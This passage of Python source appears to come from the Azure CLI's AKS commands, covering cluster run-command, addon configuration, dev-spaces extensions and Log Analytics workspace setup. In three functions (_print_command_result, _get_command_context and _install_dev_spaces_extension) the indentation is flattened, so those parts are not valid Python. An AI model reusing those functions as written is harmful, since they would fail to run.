    if upgrade_all:
        for agent_profile in instance.agent_pool_profiles:
            agent_profile.orchestrator_version = kubernetes_version

    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None

    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
    """Start a node-image-version upgrade for one node pool, honoring no_wait."""
    operation = client.begin_upgrade_node_image_version
    return sdk_no_wait(no_wait, operation, resource_group_name, cluster_name, nodepool_name)
def aks_runcommand(cmd, client, resource_group_name, name, command_string="", command_files=None):
    """Run a command inside the managed cluster via the AKS run-command API.

    command_files optionally lists files (or ".") to ship with the command;
    they are zipped into the request context. Waits up to 300 seconds for the
    result and pretty-prints it (see _print_command_result).
    """
    colorama.init()

    # Validate before making any service calls (previously the cluster was
    # fetched even when the command was empty and the call was doomed).
    if not command_string:
        raise ValidationError('Command cannot be empty.')

    mc = client.get(resource_group_name, name)

    RunCommandRequest = cmd.get_models('RunCommandRequest', resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                       operation_group='managed_clusters')
    request_payload = RunCommandRequest(command=command_string)
    request_payload.context = _get_command_context(command_files)

    # if this cluster have Azure AD enabled, we should pass user token.
    # so the command execution also using current user identity.
    # here we acquire token for AKS managed server AppID (same id for all clouds)
    if mc.aad_profile is not None and mc.aad_profile.managed:
        request_payload.cluster_token = _get_dataplane_aad_token(
            cmd.cli_ctx, "6dae42f8-4368-4678-94ff-3960e28e3630")

    command_result_future = client.begin_run_command(
        resource_group_name, name, request_payload, polling_interval=5, retry_total=0)
    return _print_command_result(cmd.cli_ctx, command_result_future.result(300))
def aks_command_result(cmd, client, resource_group_name, name, command_id=""):
    """Fetch the result of a previously started run-command invocation and print it."""
    if not command_id:
        raise ValidationError('CommandID cannot be empty.')

    result = client.get_command_result(resource_group_name, name, command_id)
    return _print_command_result(cmd.cli_ctx, result)
def _print_command_result(cli_ctx, commandResult):
# cli_ctx.data['safe_params'] contains list of parameter name user typed in, without value.
# cli core also use this calculate ParameterSetName header for all http request from cli.
if (cli_ctx.data['safe_params'] is None or
"-o" in cli_ctx.data['safe_params'] or
"--output" in cli_ctx.data['safe_params']):
# user specified output format, honor their choice, return object to render pipeline
return commandResult
# user didn't specified any format, we can customize the print for best experience
if commandResult.provisioning_state == "Succeeded":
# succeed, print exitcode, and logs
print(
f"{colorama.Fore.GREEN}command started at {commandResult.started_at}, "
f"finished at {commandResult.finished_at} "
f"with exitcode={commandResult.exit_code}{colorama.Style.RESET_ALL}")
print(commandResult.logs)
return
if commandResult.provisioning_state == "Failed":
# failed, print reason in error
print(
f"{colorama.Fore.RED}command failed with reason: {commandResult.reason}{colorama.Style.RESET_ALL}")
return
# *-ing state
print(f"{colorama.Fore.BLUE}command is in : {commandResult.provisioning_state} state{colorama.Style.RESET_ALL}")
return None
def _get_command_context(command_files):
if not command_files:
return ""
filesToAttach = {}
# . means to attach current folder, cannot combine more files. (at least for now)
if len(command_files) == 1 and command_files[0] == ".":
# current folder
cwd = os.getcwd()
for filefolder, _, files in os.walk(cwd):
for file in files:
# retain folder structure
rel = os.path.relpath(filefolder, cwd)
filesToAttach[os.path.join(
filefolder, file)] = os.path.join(rel, file)
else:
for file in command_files:
if file == ".":
raise ValidationError(
". is used to attach current folder, not expecting other attachements.")
if os.path.isfile(file):
# for individual attached file, flatten them to same folder
filesToAttach[file] = os.path.basename(file)
else:
raise ValidationError(
f"{file} is not valid file, or not accessable.")
if len(filesToAttach) < 1:
logger.debug("no files to attach!")
return ""
zipStream = io.BytesIO()
zipFile = zipfile.ZipFile(zipStream, "w")
for _, (osfile, zipEntry) in enumerate(filesToAttach.items()):
zipFile.write(osfile, zipEntry)
# zipFile.printdir() // use this to debug
zipFile.close()
return str(base64.encodebytes(zipStream.getbuffer()), "utf-8")
def _get_dataplane_aad_token(cli_ctx, serverAppId):
    """Acquire an AAD access token for the given server application id.

    Returns the raw access-token string for the current CLI credentials.
    Raises CLIError when the credentials have expired (AADSTS70008) or token
    acquisition fails for any other adal-reported reason.
    """
    # this function is mostly copied from keyvault cli
    import adal
    try:
        # get_raw_token returns ((scheme, token, token_entry), sub, tenant);
        # [0][2] is the token entry dict holding 'accessToken'.
        return Profile(cli_ctx=cli_ctx).get_raw_token(resource=serverAppId)[0][2].get('accessToken')
    except adal.AdalError as err:
        # pylint: disable=no-member
        # AADSTS70008 means the refresh token expired -> ask for re-login.
        if (hasattr(err, 'error_response') and
                ('error_description' in err.error_response) and
                ('AADSTS70008:' in err.error_response['error_description'])):
            raise CLIError(
                "Credentials have expired due to inactivity. Please run 'az login'")
        raise CLIError(err)
# Name and implementation module of the Azure Dev Spaces CLI extension, used
# by the use-dev-spaces / remove-dev-spaces commands below.
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
                       endpoint_type='Public', prompt=False):
    """
    Use Azure Dev Spaces with a managed Kubernetes cluster.

    :param name: Name of the managed cluster.
    :type name: String
    :param resource_group_name: Name of resource group. You can configure the default group. \
    Using 'az configure --defaults group=<name>'.
    :type resource_group_name: String
    :param update: Update to the latest Azure Dev Spaces client components.
    :type update: bool
    :param space_name: Name of the new or existing dev space to select. Defaults to an \
    interactive selection experience.
    :type space_name: String
    :param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
    See https://aka.ms/azds-networking for more information.
    :type endpoint_type: String
    :param prompt: Do not prompt for confirmation. Requires --space.
    :type prompt: bool
    """
    if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
        azext_custom = _get_azext_module(
            DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
        try:
            azext_custom.ads_use_dev_spaces(
                name, resource_group_name, update, space_name, endpoint_type, prompt)
        except TypeError as err:
            # An outdated extension exposes a different signature; chain the
            # original error (PEP 3134) so the root cause stays debuggable.
            raise CLIError(
                "Use '--update' option to get the latest Azure Dev Spaces client components.") from err
        except AttributeError as ae:
            raise CLIError(ae) from ae
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
    """
    Remove Azure Dev Spaces from a managed Kubernetes cluster.

    :param name: Name of the managed cluster.
    :type name: String
    :param resource_group_name: Name of resource group. You can configure the default group. \
    Using 'az configure --defaults group=<name>'.
    :type resource_group_name: String
    :param prompt: Do not prompt for confirmation.
    :type prompt: bool
    """
    if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
        azext_custom = _get_azext_module(
            DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
        try:
            azext_custom.ads_remove_dev_spaces(
                name, resource_group_name, prompt)
        except AttributeError as ae:
            # Chain the original error (PEP 3134) so the root cause stays
            # visible in the traceback.
            raise CLIError(ae) from ae
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
    """Rotate the certificates and keys of a managed cluster (long-running; defaults to not waiting)."""
    return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable,
                   workspace_resource_id=None,
                   subnet_name=None,
                   appgw_name=None,
                   appgw_subnet_cidr=None,
                   appgw_id=None,
                   appgw_subnet_id=None,
                   appgw_watch_namespace=None,
                   enable_sgxquotehelper=False,
                   no_wait=False):
    """Enable or disable addons on a managed-cluster model in memory.

    ``addons`` is a comma-separated list of CLI addon names (validated
    against the ADDONS map); ``enable`` selects whether they are turned on
    (with addon-specific config from the keyword arguments) or off. Mutates
    and returns ``instance``; the caller is responsible for the PUT.

    Raises CLIError / ValidationError for unknown addons, re-enabling an
    already-enabled addon, or missing required per-addon settings.
    """
    ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
                                                resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                operation_group='managed_clusters')

    # parse the comma-separated addons argument
    addon_args = addons.split(',')

    addon_profiles = instance.addon_profiles or {}

    os_type = 'Linux'

    # for each addons argument
    for addon_arg in addon_args:
        if addon_arg not in ADDONS:
            raise CLIError("Invalid addon name: {}.".format(addon_arg))
        addon = ADDONS[addon_arg]
        if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
            # only linux is supported for now, in the future this will be a user flag
            addon += os_type

        # honor addon names defined in Azure CLI (normalize differently-cased
        # keys already present on the cluster to the canonical name)
        for key in list(addon_profiles):
            if key.lower() == addon.lower() and key != addon:
                addon_profiles[addon] = addon_profiles.pop(key)

        if enable:
            # add new addons or update existing ones and enable them
            addon_profile = addon_profiles.get(
                addon, ManagedClusterAddonProfile(enabled=False))
            # special config handling for certain addons
            if addon == CONST_MONITORING_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
                                   'before enabling it again.')
                if not workspace_resource_id:
                    workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
                        cmd,
                        subscription_id,
                        resource_group_name)
                # normalize the workspace ARM id: leading slash, no trailing slash
                workspace_resource_id = workspace_resource_id.strip()
                if not workspace_resource_id.startswith('/'):
                    workspace_resource_id = '/' + workspace_resource_id
                if workspace_resource_id.endswith('/'):
                    workspace_resource_id = workspace_resource_id.rstrip('/')
                addon_profile.config = {
                    CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
            elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
                if addon_profile.enabled:
                    raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
                                   'To change virtual-node configuration, run '
                                   '"az aks disable-addons -a virtual-node -g {resource_group_name}" '
                                   'before enabling it again.')
                if not subnet_name:
                    raise CLIError(
                        'The aci-connector addon requires setting a subnet name.')
                addon_profile.config = {
                    CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
            elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
                                   'To change ingress-appgw configuration, run '
                                   f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                # ingress-appgw config is rebuilt from scratch from the flags
                addon_profile = ManagedClusterAddonProfile(
                    enabled=True, config={})
                if appgw_name is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
                if appgw_subnet_cidr is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
                if appgw_id is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
                if appgw_subnet_id is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
                if appgw_watch_namespace is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
            elif addon == CONST_CONFCOM_ADDON_NAME:
                if addon_profile.enabled:
                    raise ValidationError('The confcom addon is already enabled for this managed cluster.',
                                          recommendation='To change confcom configuration, run '
                                          f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
                                          'before enabling it again.')
                addon_profile = ManagedClusterAddonProfile(
                    enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
                if enable_sgxquotehelper:
                    addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
            addon_profiles[addon] = addon_profile
        else:
            if addon not in addon_profiles:
                if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
                    # kube-dashboard may be absent from the model; disabling it
                    # is a no-op profile rather than an error
                    addon_profiles[addon] = ManagedClusterAddonProfile(
                        enabled=False)
                else:
                    raise CLIError(
                        "The addon {} is not installed.".format(addon))
            addon_profiles[addon].config = None
        addon_profiles[addon].enabled = enable

    instance.addon_profiles = addon_profiles

    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None

    return instance
def _get_azext_module(extension_name, module_name):
    """Import and return the implementation module of an installed CLI extension.

    Raises CLIError when the extension module cannot be imported.
    """
    try:
        # Adding the installed extension in the path
        from azure.cli.core.extension.operations import add_extension_to_path
        add_extension_to_path(extension_name)
        # Import the extension module
        from importlib import import_module
        azext_custom = import_module(module_name)
        return azext_custom
    except ImportError as ie:
        # Chain the ImportError (PEP 3134) so the failing import is visible.
        raise CLIError(ie) from ie
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
                        workspace_resource_id=None,
                        aci_subnet_name=None,
                        vnet_subnet_id=None,
                        appgw_name=None,
                        appgw_subnet_cidr=None,
                        appgw_id=None,
                        appgw_subnet_id=None,
                        appgw_watch_namespace=None,
                        enable_sgxquotehelper=False):
    """Translate the --enable-addons string (used at create time) into addon profiles.

    Each recognized addon name is removed from the parsed list as it is
    handled; anything left over is unknown and raises CLIError. Returns the
    (possibly pre-seeded) addon_profiles dict.
    """
    ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
                                                resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                operation_group='managed_clusters')
    if not addon_profiles:
        addon_profiles = {}
    addons = addons_str.split(',') if addons_str else []
    if 'http_application_routing' in addons:
        addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True)
        addons.remove('http_application_routing')
    if 'kube-dashboard' in addons:
        addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True)
        addons.remove('kube-dashboard')
    # TODO: can we help the user find a workspace resource ID?
    if 'monitoring' in addons:
        if not workspace_resource_id:
            # use default workspace if exists else create default workspace
            workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
                cmd, subscription_id, resource_group_name)
        # normalize the workspace ARM id: leading slash, no trailing slash
        workspace_resource_id = workspace_resource_id.strip()
        if not workspace_resource_id.startswith('/'):
            workspace_resource_id = '/' + workspace_resource_id
        if workspace_resource_id.endswith('/'):
            workspace_resource_id = workspace_resource_id.rstrip('/')
        addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
        addons.remove('monitoring')
    # error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
    elif workspace_resource_id:
        raise CLIError(
            '"--workspace-resource-id" requires "--enable-addons monitoring".')
    if 'azure-policy' in addons:
        addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True)
        addons.remove('azure-policy')
    if 'virtual-node' in addons:
        if not aci_subnet_name or not vnet_subnet_id:
            raise CLIError(
                '"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
        # TODO: how about aciConnectorwindows, what is its addon name?
        # Only the Linux flavor is supported; the OS type is appended to the
        # addon profile key.
        os_type = 'Linux'
        addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
            enabled=True,
            config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
        )
        addons.remove('virtual-node')
    if 'ingress-appgw' in addons:
        # only the flags the user actually passed end up in the addon config
        addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
        if appgw_name is not None:
            addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
        if appgw_subnet_cidr is not None:
            addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
        if appgw_id is not None:
            addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
        if appgw_subnet_id is not None:
            addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
        if appgw_watch_namespace is not None:
            addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
        addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
        addons.remove('ingress-appgw')
    if 'confcom' in addons:
        addon_profile = ManagedClusterAddonProfile(
            enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
        if enable_sgxquotehelper:
            addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
        addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
        addons.remove('confcom')
    # error out if any (unrecognized) addons remain
    if addons:
        raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
            ",".join(addons), "are" if len(addons) > 1 else "is"))
    return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
    """Update and reload the named CLI extension.

    Returns True when the extension ends up usable, False when it is not
    installed or its module cannot be loaded.
    """
    from azure.cli.core.extension import ExtensionNotInstalledException
    try:
        from azure.cli.core.extension import operations
        operations.update_extension(cmd=cmd, extension_name=extension_name)
        operations.reload_extension(extension_name=extension_name)
    except CLIError as err:
        # NOTE(review): a CLIError here is only logged and the function still
        # returns True -- presumably "update failed but extension is usable";
        # confirm before changing.
        logger.info(err)
    except ExtensionNotInstalledException as err:
        logger.debug(err)
        return False
    except ModuleNotFoundError as err:
        logger.debug(err)
        logger.error(
            "Error occurred attempting to load the extension module. Use --debug for more information.")
        return False
    return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
    """Ensure a CLI extension is available, optionally updating it.

    Returns True when the extension is present (already installed, or just
    installed); the install/update helpers' False results are passed through.
    """
    from azure.cli.core.extension import ExtensionNotInstalledException, get_extension
    try:
        get_extension(extension_name)
        # Note: the update path stays inside the try so an
        # ExtensionNotInstalledException from it also falls back to install.
        if update:
            return _update_dev_spaces_extension(cmd, extension_name, extension_module)
    except ExtensionNotInstalledException:
        return _install_dev_spaces_extension(cmd, extension_name)
    return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
    """Return the resource ID of the default Log Analytics workspace used by
    the monitoring addon, creating the workspace (and its dedicated resource
    group) if it does not exist yet.

    The workspace region is derived from the cluster resource group's location
    through the per-cloud mapping tables below, and the workspace is named
    'DefaultWorkspace-<subscription_id>-<regionCode>' inside
    'DefaultResourceGroup-<regionCode>'.

    :raises CLIError: when the resource group's region belongs to a different
        cloud than the one currently configured via "az cloud set".
    """
    # mapping for azure public cloud
    # log analytics workspaces cannot be created in WCUS region due to capacity limits
    # so mapped to EUS per discussion with log analytics team
    AzureCloudLocationToOmsRegionCodeMap = {
        "australiasoutheast": "ASE",
        "australiaeast": "EAU",
        "australiacentral": "CAU",
        "canadacentral": "CCA",
        "centralindia": "CIN",
        "centralus": "CUS",
        "eastasia": "EA",
        "eastus": "EUS",
        "eastus2": "EUS2",
        "eastus2euap": "EAP",
        "francecentral": "PAR",
        "japaneast": "EJP",
        "koreacentral": "SE",
        "northeurope": "NEU",
        "southcentralus": "SCUS",
        "southeastasia": "SEA",
        "uksouth": "SUK",
        "usgovvirginia": "USGV",
        "westcentralus": "EUS",
        "westeurope": "WEU",
        "westus": "WUS",
        "westus2": "WUS2",
        "brazilsouth": "CQ",
        "brazilsoutheast": "BRSE",
        "norwayeast": "NOE",
        "southafricanorth": "JNB",
        "northcentralus": "NCUS",
        "uaenorth": "DXB",
        "germanywestcentral": "DEWC",
        "ukwest": "WUK",
        "switzerlandnorth": "CHN",
        "switzerlandwest": "CHW",
        "uaecentral": "AUH"
    }
    # Maps a cluster region to the nearest region where Log Analytics is
    # available in the public cloud.
    AzureCloudRegionToOmsRegionMap = {
        "australiacentral": "australiacentral",
        "australiacentral2": "australiacentral",
        "australiaeast": "australiaeast",
        "australiasoutheast": "australiasoutheast",
        "brazilsouth": "brazilsouth",
        "canadacentral": "canadacentral",
        "canadaeast": "canadacentral",
        "centralus": "centralus",
        "centralindia": "centralindia",
        "eastasia": "eastasia",
        "eastus": "eastus",
        "eastus2": "eastus2",
        "francecentral": "francecentral",
        "francesouth": "francecentral",
        "japaneast": "japaneast",
        "japanwest": "japaneast",
        "koreacentral": "koreacentral",
        "koreasouth": "koreacentral",
        "northcentralus": "northcentralus",
        "northeurope": "northeurope",
        "southafricanorth": "southafricanorth",
        "southafricawest": "southafricanorth",
        "southcentralus": "southcentralus",
        "southeastasia": "southeastasia",
        "southindia": "centralindia",
        "uksouth": "uksouth",
        "ukwest": "ukwest",
        "westcentralus": "eastus",
        "westeurope": "westeurope",
        "westindia": "centralindia",
        "westus": "westus",
        "westus2": "westus2",
        "norwayeast": "norwayeast",
        "norwaywest": "norwayeast",
        "switzerlandnorth": "switzerlandnorth",
        "switzerlandwest": "switzerlandwest",
        "uaenorth": "uaenorth",
        "germanywestcentral": "germanywestcentral",
        "germanynorth": "germanywestcentral",
        "uaecentral": "uaecentral",
        "eastus2euap": "eastus2euap",
        "brazilsoutheast": "brazilsoutheast"
    }
    # mapping for azure china cloud
    # currently log analytics supported only China East 2 region
    AzureChinaLocationToOmsRegionCodeMap = {
        "chinaeast": "EAST2",
        "chinaeast2": "EAST2",
        "chinanorth": "EAST2",
        "chinanorth2": "EAST2"
    }
    AzureChinaRegionToOmsRegionMap = {
        "chinaeast": "chinaeast2",
        "chinaeast2": "chinaeast2",
        "chinanorth": "chinaeast2",
        "chinanorth2": "chinaeast2"
    }
    # mapping for azure us government cloud
    AzureFairfaxLocationToOmsRegionCodeMap = {
        "usgovvirginia": "USGV",
        "usgovarizona": "PHX"
    }
    AzureFairfaxRegionToOmsRegionMap = {
        "usgovvirginia": "usgovvirginia",
        "usgovtexas": "usgovvirginia",
        "usgovarizona": "usgovarizona"
    }
    rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    cloud_name = cmd.cli_ctx.cloud.name
    # Fallbacks used when the region is not present in any mapping table.
    workspace_region = "eastus"
    workspace_region_code = "EUS"
    # sanity check that locations and clouds match.
    if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
            (cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
        raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
                       .format(rg_location))
    if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
            (cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
        raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
                       .format(rg_location))
    if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
            (cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
        raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
                       .format(rg_location))
    # Resolve the workspace region and its short code for the current cloud.
    if cloud_name.lower() == 'azurecloud':
        workspace_region = AzureCloudRegionToOmsRegionMap.get(
            rg_location, "eastus")
        workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(
            workspace_region, "EUS")
    elif cloud_name.lower() == 'azurechinacloud':
        workspace_region = AzureChinaRegionToOmsRegionMap.get(
            rg_location, "chinaeast2")
        workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(
            workspace_region, "EAST2")
    elif cloud_name.lower() == 'azureusgovernment':
        workspace_region = AzureFairfaxRegionToOmsRegionMap.get(
            rg_location, "usgovvirginia")
        workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(
            workspace_region, "USGV")
    else:
        # Unknown cloud (e.g. a private/air-gapped cloud): use the RG region
        # as-is and derive a code from its upper-cased name.
        workspace_region = rg_location
        workspace_region_code = rg_location.upper()
    default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
    default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(
        subscription_id, workspace_region_code)
    default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
        '/workspaces/{2}'.format(subscription_id,
                                 default_workspace_resource_group, default_workspace_name)
    resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
    resources = cf_resources(cmd.cli_ctx, subscription_id)
    # check if default RG exists
    if resource_groups.check_existence(default_workspace_resource_group):
        try:
            resource = resources.get_by_id(
                default_workspace_resource_id, '2015-11-01-preview')
            return resource.id
        except CloudError as ex:
            # 404 means the RG exists but the workspace does not: create it below.
            if ex.status_code != 404:
                raise ex
    else:
        resource_groups.create_or_update(default_workspace_resource_group, {
            'location': workspace_region})
    # TODO: track2/replace create_or_update with begin_create_or_update, depends on 'azure.mgmt.resource.resources'
    GenericResource = cmd.get_models(
        'GenericResource', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
    generic_resource = GenericResource(location=workspace_region, properties={
        'sku': {'name': 'standalone'}})
    async_poller = resources.begin_create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
                                                          generic_resource)
    ws_resource_id = ''
    # Poll in 15-second slices until the workspace creation completes.
    while True:
        result = async_poller.result(15)
        if async_poller.done():
            ws_resource_id = result.id
            break
    return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
    """Deploy the ContainerInsights solution onto the Log Analytics workspace
    referenced by the monitoring addon's config.

    Reads the workspace resource ID from ``addon.config``, normalizes it,
    resolves the workspace's actual region (which may differ from the cluster
    resource group's region), and submits an ARM deployment that creates a
    'ContainerInsights(<workspace>)' Microsoft.OperationsManagement solution.

    :param addon: the monitoring ManagedClusterAddonProfile; its config must
        contain the workspace resource ID key.
    :return: the result of the ARM deployment invocation.
    :raises CLIError: when the workspace resource ID cannot be parsed.
    """
    # Workaround for this addon key which has been seen lowercased in the wild.
    for key in list(addon.config):
        if (key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and
                key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID):
            addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(
                key)
    # Normalize the ID: trim whitespace, ensure a leading '/', drop trailing '/'.
    workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID]
    workspace_resource_id = workspace_resource_id.strip()
    if not workspace_resource_id.startswith('/'):
        workspace_resource_id = '/' + workspace_resource_id
    if workspace_resource_id.endswith('/'):
        workspace_resource_id = workspace_resource_id.rstrip('/')
    # extract subscription ID and resource group from workspace_resource_id URL
    try:
        subscription_id = workspace_resource_id.split('/')[2]
        resource_group = workspace_resource_id.split('/')[4]
    except IndexError:
        raise CLIError(
            'Could not locate resource group in workspace-resource-id URL.')
    # region of workspace can be different from region of RG so find the location of the workspace_resource_id
    resources = cf_resources(cmd.cli_ctx, subscription_id)
    try:
        resource = resources.get_by_id(
            workspace_resource_id, '2015-11-01-preview')
        location = resource.location
    except CloudError as ex:
        raise ex
    # Millisecond timestamp used to make deployment names unique.
    unix_time_in_millis = int(
        (datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
    solution_deployment_name = 'ContainerInsights-{}'.format(
        unix_time_in_millis)
    # Nested ARM deployment: the outer deployment targets the workspace's own
    # subscription/RG (split from the workspace resource ID), and its inner
    # template creates the ContainerInsights solution bound to the workspace.
    # pylint: disable=line-too-long
    template = {
        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
        "contentVersion": "1.0.0.0",
        "parameters": {
            "workspaceResourceId": {
                "type": "string",
                "metadata": {
                    "description": "Azure Monitor Log Analytics Resource ID"
                }
            },
            "workspaceRegion": {
                "type": "string",
                "metadata": {
                    "description": "Azure Monitor Log Analytics workspace region"
                }
            },
            "solutionDeploymentName": {
                "type": "string",
                "metadata": {
                    "description": "Name of the solution deployment"
                }
            }
        },
        "resources": [
            {
                "type": "Microsoft.Resources/deployments",
                "name": "[parameters('solutionDeploymentName')]",
                "apiVersion": "2017-05-10",
                "subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
                "resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
                "properties": {
                    "mode": "Incremental",
                    "template": {
                        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
                        "contentVersion": "1.0.0.0",
                        "parameters": {},
                        "variables": {},
                        "resources": [
                            {
                                "apiVersion": "2015-11-01-preview",
                                "type": "Microsoft.OperationsManagement/solutions",
                                "location": "[parameters('workspaceRegion')]",
                                "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
                                "properties": {
                                    "workspaceResourceId": "[parameters('workspaceResourceId')]"
                                },
                                "plan": {
                                    "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
                                    "product": "[Concat('OMSGallery/', 'ContainerInsights')]",
                                    "promotionCode": "",
                                    "publisher": "Microsoft"
                                }
                            }
                        ]
                    },
                    "parameters": {}
                }
            }
        ]
    }
    params = {
        "workspaceResourceId": {
            "value": workspace_resource_id
        },
        "workspaceRegion": {
            "value": location
        },
        "solutionDeploymentName": {
            "value": solution_deployment_name
        }
    }
